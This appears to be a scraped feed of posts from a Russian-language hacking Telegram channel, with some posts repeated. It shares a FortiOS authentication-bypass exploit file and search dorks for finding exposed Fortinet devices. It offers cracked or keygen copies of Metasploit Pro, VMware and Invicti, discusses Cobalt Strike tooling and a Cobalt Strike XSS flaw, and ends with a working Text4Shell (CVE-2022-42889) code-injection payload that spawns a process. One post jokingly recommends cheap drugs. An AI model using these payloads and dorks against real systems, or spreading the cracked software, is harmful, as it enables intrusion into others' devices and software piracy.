CVE-2022-40684_rce.yml
1.5 KB
CVE-2022-40684
FortiOS Authentication Bypass
POC предоставляет доступ по SSH без какого-либо взаимодействия с уязвимыми экземплярами FortiOS👍8🔥3
Так, RCE (CVE-2022-40684 ) вон выше дали, а вы сидите без дела, пятница ? ))))
*
Dork: http://tag.name:(
Link to search: app.netlas
#fortinet
*
Dork: http://tag.name:(
fortinet ИЛИ fortigate_vpn)Link to search: app.netlas
#fortinet
🔥11👍2😱2
MetasploitPro_4.21.zip
237.5 MB
🔥15😱2👍1
VMware-workstation-full-16.2.zip
562.4 MB
VMware-workstation-full-16.2.4 + keygen
*
Может кто поделится ключом или ломанной версиейпод linux (а то у меня ядро больно свежее) ???
*
Может кто поделится ключом или ломанной версиейпод linux (а то у меня ядро больно свежее) ???
👍3😱3
Invicti Professional Edition v6.8.0.38168.zip
476.2 MB
Invicti Professional Edition v6.8.0.38168
Тот который Netsparker
День релизов прям 😜
#netsparker #invicti
Тот который Netsparker
День релизов прям 😜
#netsparker #invicti
ухххххх, ребята слишком жирно стелят )))))))
Cobaltstrike mobile client, cobaltstrike mobile version
csdroid
Всегда найдется азиат который сделает это лучше. Репозиторий конечно же шляпа, НО - кто нить мысль подхватит....
#cobaltstrike
Cobaltstrike mobile client, cobaltstrike mobile version
csdroid
Всегда найдется азиат который сделает это лучше. Репозиторий конечно же шляпа, НО - кто нить мысль подхватит....
#cobaltstrike
👍11😱5🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
Значит так:
1. берем по дешевке монохромный ЭЛТ монитор
2. Берем дешевых наркотиков
3. Инсталлим OSINTUI
4. чувствуем киберпанк
1. берем по дешевке монохромный ЭЛТ монитор
2. Берем дешевых наркотиков
3. Инсталлим OSINTUI
4. чувствуем киберпанк
🔥17😱4
Однажды Ваши дети Вас спросят: пап\мам, а как вы заработали свои миллионы ?
Просто покажите им это ВИДЕО
CVE-2022-39197 is an XSS vulnerability in Cobalt Strike.
Дыра актуальна - пока в паблике на халяву версии с патчем не обнаружено
#рыбак_рыбака #cobaltstrike
Просто покажите им это ВИДЕО
CVE-2022-39197 is an XSS vulnerability in Cobalt Strike.
Дыра актуальна - пока в паблике на халяву версии с патчем не обнаружено
#рыбак_рыбака #cobaltstrike
👍8🔥1
Рубрика "нихераси))))"
ШеллКод лоадер в MicrosoftStore ? да легко))
закупиться
Сортировка: самые полезные))))
#shellcode
ШеллКод лоадер в MicrosoftStore ? да легко))
закупиться
Сортировка: самые полезные))))
#shellcode
👍17
LockBit и 1000$
Ну как и ожидалось, вся эта тема с татухами хорошего не сулила.
LockBit-Tattoo
А теперь смотрим информацию о владельце репозитория и ....ясно понятно
#98%
Ну как и ожидалось, вся эта тема с татухами хорошего не сулила.
LockBit-Tattoo
А теперь смотрим информацию о владельце репозитория и ....ясно понятно
#98%
😱7👍1
BurpSuite: на удаленке (командная работа)
BurpSuite-Team-Extension
Теперь пентестить ВЕБ можно всей командой, оперативно обмениваться инфой в реалТайме
*
Имеется (Mutual TLS Encryption of all traffic between client and server)
#burp #team
BurpSuite-Team-Extension
Теперь пентестить ВЕБ можно всей командой, оперативно обмениваться инфой в реалТайме
*
Имеется (Mutual TLS Encryption of all traffic between client and server)
#burp #team
CVE-2022-42889
Apache - Commons Text library
CVSS: 9.8 CRITICAL
Почитать про дырку тут
POC
Java:
Apache - Commons Text library
CVSS: 9.8 CRITICAL
Почитать про дырку тут
POC
Java:
StringSubstitutor.createInterpolator().replace("${noscript:js:new java.lang.ProcessBuilder(\"calc\").start()}");
#apache👍15